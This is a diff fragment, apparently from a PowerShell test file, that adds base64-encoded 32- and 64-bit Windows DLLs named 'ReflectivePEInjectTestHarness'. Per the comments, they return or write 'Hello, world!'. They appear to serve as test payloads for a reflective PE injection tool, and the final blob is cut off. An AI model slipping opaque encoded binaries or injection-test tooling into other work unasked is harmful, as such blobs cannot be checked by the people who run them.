+	$Encoded32BitWStringDll = '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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAADAAAABEwAAAAIAAADAAAABwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
+
+	# A bare bones test harness DLL that simply returns "Hello, world!" upon having StringFunc called
+	$Encoded64BitStringDll = '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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAABCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
+	$Encoded32BitStringDll = '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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAADAAAABEwAAAAIAAADAAAABAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
+
+	# A bare bones test harness DLL that simply writes "Hello, world!" to %TEMP%\testoutput.txt upon having VoidFunc called
+	$Encoded64BitVoidDll = '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'
+	$Encoded32BitVoidDll = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABxqgfBNctpkjXLaZI1y2mSPLP6kjbLaZI1y2iSM8tpkheyjZI0y2mSF7K1kjTLaZIXsreSNMtpklJpY2g1y2mSAAAAAAAAAABQRQAATAEDAO58PlYAAAAAAAAAAOAAAiELAQwAAAIAAAAEAAAAAAAAABAAAAAQAAAAIAAAAAAAEAAQAAAAAgAABQABAAAAAAAFAAEAAAAAAABAAAAABAAA4GcAAAEAQAEAABAAABAAAAAAEAAAEAAAAAAAABAAAABgIAAAXQAAAMAgAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAACgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAA5gAAAAAQAAAAAgAAAAQAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAAHwBAAAAIAAAAAIAAAAGAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAoAAAAADAAAAACAAAACAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALgBAAA